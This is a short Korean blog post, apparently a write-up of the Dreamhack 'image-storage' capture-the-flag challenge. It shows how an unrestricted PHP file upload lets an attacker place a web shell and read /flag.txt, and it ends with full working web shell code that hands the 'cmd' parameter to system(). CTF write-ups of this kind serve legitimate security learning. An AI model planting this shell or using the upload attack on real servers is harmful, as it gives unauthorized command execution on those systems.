WEB hacking/드림핵(dreamhack)

드림핵 image-storage Write Up

Roronoa 2023. 8. 7. 10:05
반응형

문제 설명

[그림 1] 문제 설명

해당 문제는 php로 제작된 파일 저장 사이트를 파일업로드 취약점을 이용하여 /flag.txt 파일의 내용을 읽는 문제이다.

 

[그림 2] 웹쉘 업로드

php로 제작한 웹쉘을 해당 서버에 업로드한다.

 

[그림 3] 파일 업로드 경로 노출

파일 업로드를 완료하면 파일 업로드된 경로를 노출하고 있다. 해당 경로에 접속하여 웹 쉘을 실행할 수 있다.

 

[그림 4] 웹 쉘 실행

웹 쉘에 접근하여 cat /flag.txt 명령어를 입력하면 flag값을 얻을 수 있다.

 

php 웹쉘 코드

<html>
<body>
	<form method="GET" action="" >
		<input type="text" name="cmd">
		<input type="submit">
	</form>
<?php
	if(isset($_GET["cmd"])){
		system($_GET["cmd"]);
	}
?>
</body>
</html>
반응형